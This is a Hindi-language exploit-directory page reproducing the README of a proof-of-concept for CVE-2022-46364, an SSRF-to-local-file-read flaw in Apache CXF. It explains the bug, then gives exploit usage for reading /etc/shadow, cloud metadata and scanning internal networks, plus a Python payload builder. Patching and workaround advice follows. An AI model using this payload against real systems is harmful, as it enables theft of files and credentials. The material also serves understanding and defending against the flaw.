Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-46364-Proof-of-the-concept — यह भेद्यता एक हमलावर को Apache CXF वेबसेवाओं पर SSRF (सर्वर-साइड रिक्वेस्ट फोर्जरी) हमले करने की अनुमति देती है जो MTOM/XOP अनुरोधों को स्वीकार करती हैं। समस्या xop:Include के href विशेषता को पार्स करने के तरीके में मौजूद है, जिससे सर्वर द्वारा मनमाने URL का अनुरोध किया जा सकता है। | Kitploit
उपकरण/GitHubGitHub/cybermaksx/cve-2022-46364-proof-of-the-concept
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubcybermaksx/cve-2022-46364-proof-of-the-concept

CVE-2022-46364-Proof-of-the-concept

रिपॉजिटरी देखें
25 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

यह भेद्यता एक हमलावर को Apache CXF वेबसेवाओं पर SSRF (सर्वर-साइड रिक्वेस्ट फोर्जरी) हमले करने की अनुमति देती है जो MTOM/XOP अनुरोधों को स्वीकार करती हैं। समस्या xop:Include के href विशेषता को पार्स करने के तरीके में मौजूद है, जिससे सर्वर द्वारा मनमाने URL का अनुरोध किया जा सकता है।

साझा करें

CVE-2022-46364: Apache CXF MTOM XOP:Include SSRF से LFI शोषण

⚠️ अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है

यह प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है ताकि सुरक्षा पेशेवर इस भेद्यता को समझ सकें और अपने सिस्टम की सुरक्षा कर सकें। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक इस टूल के किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है। परीक्षण से पहले आपको सिस्टम स्वामी से स्पष्ट लिखित अनुमति प्राप्त करनी होगी। इस टूल का उपयोग करके, आप सभी लागू कानूनों का पालन करने के लिए सहमत होते हैं।


📋 विषय-सूची

  1. अवलोकन
  2. भेद्यता विवरण
  3. तकनीकी गहन विश्लेषण
  4. एक्सप्लॉइट उपयोग
  5. स्थापना और आवश्यकताएँ
  6. शमन
  7. संदर्भ और श्रेय

📌 अवलोकन

विशेषतामान
CVE IDCVE-2022-46364
GHSA IDGHSA-x3x3-qwjq-8gj4
भेद्यता प्रकारसर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) → लोकल फाइल इन्क्लूज़न (LFI)
प्रभावित सॉफ़्टवेयरApache CXF < 3.5.5, Apache CXF < 3.4.10
गंभीरताक्रिटिकल
CVSS स्कोर9.8 (क्रिटिकल)
आक्रमण वेक्टरनेटवर्क
प्रमाणीकरणकोई आवश्यक नहीं
पैच संस्करणApache CXF 3.5.5+, 3.4.10+

यह एक्सप्लॉइट Apache CXF के MTOM (मैसेज ट्रांसमिशन ऑप्टिमाइज़ेशन मैकेनिज़्म) कार्यान्वयन में एक गंभीर SSRF भेद्यता का लाभ उठाकर लोकल फाइल इन्क्लूज़न (LFI) और आंतरिक नेटवर्क स्कैनिंग क्षमताएँ प्राप्त करता है।


🔬 भेद्यता विवरण

मुख्य समस्या

Apache CXF, MTOM-एन्कोडेड SOAP संदेशों को संसाधित करते समय xop:Include तत्वों के भीतर href विशेषता को गलत तरीके से सत्यापित करता है। लाइब्रेरी URI को डीरेफ़रेंस करने के लिए Java के URLConnection का उपयोग करती है, बिना उचित प्रोटोकॉल प्रतिबंधों के, जिससे हमलावर निम्नलिखित निर्दिष्ट कर सकते हैं:

  • file:// - स्थानीय फ़ाइलें पढ़ना (LFI)
  • http:// / https:// - आंतरिक नेटवर्क अनुरोध (SSRF)
  • ftp:// - FTP अनुरोध (आगे शोषण की संभावना)

यह क्यों महत्वपूर्ण है

यह भेद्यता विशेष रूप से खतरनाक है क्योंकि:

  1. कोई प्रमाणीकरण आवश्यक नहीं - हमलावर किसी भी सुलभ SOAP एंडपॉइंट को लक्षित कर सकते हैं
  2. कोई विशेष विशेषाधिकार आवश्यक नहीं - सर्वर अपने स्वयं के विशेषाधिकारों के साथ अनुरोध निष्पादित करता है
  3. सूचना प्रकटीकरण - क्लाउड मेटाडेटा (AWS, GCP, Azure), कॉन्फ़िगरेशन फ़ाइलें और सोर्स कोड उजागर कर सकता है
  4. नेटवर्क पिवोटिंग - कमजोर सर्वर आंतरिक नेटवर्क टोही के लिए प्रॉक्सी बन जाता है

प्रभावित कॉन्फ़िगरेशन

कोई भी Apache CXF तैनाती जो:

  • MTOM-एन्कोडेड SOAP संदेश स्वीकार करती है
  • कम से कम एक वेब सेवा विधि (किसी भी प्रकार के पैरामीटर के साथ) रखती है
  • मुख्य शाखा के 3.5.5 या विरासत शाखा के 3.4.10 से पहले के संस्करणों का उपयोग करती है

🧠 तकनीकी गहन विश्लेषण

प्रोटोकॉल पृष्ठभूमि: MTOM और XOP

MTOM (मैसेज ट्रांसमिशन ऑप्टिमाइज़ेशन मैकेनिज़्म) SOAP संदेशों में बाइनरी डेटा ट्रांसमिशन को अनुकूलित करने के लिए एक W3C मानक है। यह बाइनरी डेटा संदर्भों को शामिल करने के लिए XOP (XML-बाइनरी ऑप्टिमाइज़्ड पैकेजिंग) का उपयोग करता है:

root@kitploit:~
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <myData>
            <xop:Include href="cid:[email protected]" 
                        xmlns:xop="http://www.w3.org/2004/08/xop/include"/>
        </myData>
    </soap:Body>
</soap:Envelope>

सामान्यतः, href में MIME भाग के लिए एक CID (कंटेंट-आईडी) संदर्भ होता है। हालाँकि, Apache CXF की AttachmentUtil क्लास href मानों को बिना उचित सैनिटाइज़ेशन के सामान्य URI के रूप में संसाधित करती है।

कमजोर कोड पथ

  1. अनुरोध पार्सिंग:

    • CXF Content-Type: application/xop+xml के साथ एक multipart/related HTTP अनुरोध प्राप्त करता है
    • AttachmentUtil.getAttachmentObject() xop:Include तत्वों को संसाधित करता है
  2. URI डीरेफ़रेंसिंग:

    • कमजोर विधि सीधे new URL(href).openStream() को कॉल करती है
    • कोई file:// प्रोटोकॉल अवरोधन नहीं होता
    • कोई नेटवर्क प्रतिबंध नहीं होता (जैसे, आंतरिक IP श्रेणियों के विरुद्ध कोई सत्यापन नहीं)
  3. प्रतिक्रिया एम्बेडिंग:

    • प्राप्त सामग्री Base64-एन्कोडेड होती है और SOAP प्रतिक्रिया में एम्बेड की जाती है
    • हमलावर को डेटा SOAP लिफाफे में प्राप्त होता है

कोड स्निपेट (कमजोर पैटर्न)

root@kitploit:~
// Simplified representation of vulnerable code in CXF < 3.5.5
public DataHandler getAttachmentObject(String href) {
    URL url = new URL(href);  // No protocol validation!
    return new DataHandler(url.openStream());
}

LFI क्यों काम करता है

file:// प्रोटोकॉल उसी कोड पथ का अनुसरण करता है:

  • file:///etc/passwd → Java /etc/passwd को एक फ़ाइल स्ट्रीम के रूप में खोलता है
  • फ़ाइल सामग्री अनुलग्नक के रूप में लौटाई जाती है
  • CXF प्रक्रिया उपयोगकर्ता की अनुमतियों से परे कोई फ़ाइलसिस्टम प्रतिबंध नहीं होते

नेटवर्क स्कैनिंग क्षमता

IP और पोर्ट के माध्यम से पुनरावृत्ति करके, हमलावर यह कर सकते हैं:

  • आंतरिक सेवाओं की खोज करना
  • क्लाउड मेटाडेटा एंडपॉइंट्स (169.254.169.254) तक पहुँचना
  • नेटवर्क विभाजन नियंत्रणों को बायपास करना

🛠️ एक्सप्लॉइट उपयोग

कमांड सिंटैक्स

root@kitploit:~
usage: exploit.py [-h] -t TARGET [-e ENDPOINT] [-u URL] [-f FILE] [-s SCAN]

CVE-2022-46364 Apache CXF SSRF to LFI Exploit - Educational Purpose Only

options:
  -h, --help            Show this help message and exit
  -t TARGET, --target TARGET
                        Target base URL (e.g., http://192.168.1.100:8080)
  -e ENDPOINT, --endpoint ENDPOINT
                        Web service endpoint path (default: /services/Service)
  -u URL, --url URL     External URL for SSRF (e.g., http://169.254.169.254/latest/meta-data/)
  -f FILE, --file FILE  Local file path for LFI (e.g., /etc/passwd, C:\\Windows\\win.ini)
  -s SCAN, --scan SCAN  Scan internal network range in CIDR notation (e.g., 192.168.1.0/24)

तर्कों की व्याख्या

तर्कविवरणउदाहरण
-t, --targetआवश्यक। लक्षित Apache CXF सेवा का आधार URLhttp://10.10.10.50:8080
-e, --endpointवैकल्पिक। SOAP एंडपॉइंट पथ/services/UserManagement
-u, --urlSSRF के माध्यम से प्राप्त करने के लिए HTTP/HTTPS URLhttp://169.254.169.254/latest/user-data
-f, --fileLFI के माध्यम से पढ़ने के लिए स्थानीय फ़ाइल पथ/etc/shadow, C:\ProgramData\secret.txt

📦 स्थापना और आवश्यकताएँ

पूर्वापेक्षाएँ

root@kitploit:~
# Python 3.6 or higher required
python --version

स्थापना चरण

root@kitploit:~
# Clone the repository
git clone https://github.com/cybermaksxx/CVE-2022-46364-Proof-of-the-concept
cd CVE-2022-46364-PoC

### requirements

requests>=2.28.0 urllib3>=1.26.0

root@kitploit:~

---



### मुख्य कार्यान्वयन विवरण

#### 1. MTOM पेलोड निर्माण
```python
def create_mtom_payload(uri):
    """Create a multipart/related MTOM message with xop:Include"""
    soap_part = f"""--MIME_BOUNDARY
Content-Type: application/xop+xml; charset=UTF-8; type="text/xml"
Content-Transfer-Encoding: binary

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <vulnerableParam>
            <xop:Include href="{uri}" 
                        xmlns:xop="http://www.w3.org/2004/08/xop/include"/>
        </vulnerableParam>
    </soap:Body>
</soap:Envelope>
--MIME_BOUNDARY--"""
    return soap_part

🛡️ शमन

आधिकारिक समाधान

पैच किए गए संस्करण में अपग्रेड करें:

root@kitploit:~
<!-- For Maven projects -->
<dependency>
    <groupId>org.apache.cxf</groupId>
    <artifactId>cxf-rt-frontend-jaxws</artifactId>
    <version>3.5.5</version> <!-- or 3.4.10 for legacy -->
</dependency>

वर्कअराउंड (यदि पैचिंग संभव नहीं है)

  1. MTOM को पूरी तरह अक्षम करें (यदि आवश्यक नहीं है):

    root@kitploit:~
    <jaxws:endpoint ...>
        <jaxws:properties>
            <entry key="mtom-enabled" value="false"/>
        </jaxws:properties>
    </jaxws:endpoint>
    
  2. नेटवर्क-स्तरीय नियंत्रण:

    • CXF अनुप्रयोग सर्वर से बाहरी कनेक्शन प्रतिबंधित करें
    • एप्लिकेशन स्तर से आंतरिक IP श्रेणियों तक पहुँच रोकने के लिए फ़ायरवॉल का उपयोग करें
    • ईग्रेस फ़िल्टरिंग लागू करें
  3. वेब एप्लिकेशन फ़ायरवॉल (WAF) नियम:

    • href के साथ xop:Include वाले अनुरोधों को ब्लॉक करें जो file:// या आंतरिक IP पते की ओर इशारा करते हैं

📚 संदर्भ और श्रेय

मूल शोधकर्ता

यह भेद्यता निम्नलिखित द्वारा खोजी गई और जिम्मेदारी से प्रकट की गई:

  • Jonathan Leitschuh - सुरक्षा शोधकर्ता
  • Nick Tait - सुरक्षा शोधकर्ता

आधिकारिक सलाहकार

  • Apache CXF Security Advisory
  • GitHub Advisory Database: GHSA-x3x3-qwjq-8gj4
  • NVD: CVE-2022-46364

संबंधित संसाधन

  • MTOM Specification (W3C)
  • XOP Specification (W3C)
  • Apache CXF Documentation

आभार

  • त्वरित प्रतिक्रिया और पैच के लिए Apache CXF टीम
  • सलाह प्रकाशित करने के लिए GitHub Security Lab
  • जिम्मेदार प्रकटीकरण प्रथाओं के लिए सुरक्षा समुदाय

📄 लाइसेंस

यह टूल केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। अनधिकृत उपयोग निषिद्ध है।

root@kitploit:~
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

अंतिम अद्यतन: मार्च 2026
संस्करण: 1.0
संपर्क: सुरक्षा चिंताओं या प्रश्नों के लिए, कृपया GitHub पर एक issue खोलें।


यह दस्तावेज़ जिम्मेदार सुरक्षा अनुसंधान का हिस्सा है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

टूल डाउनलोड करें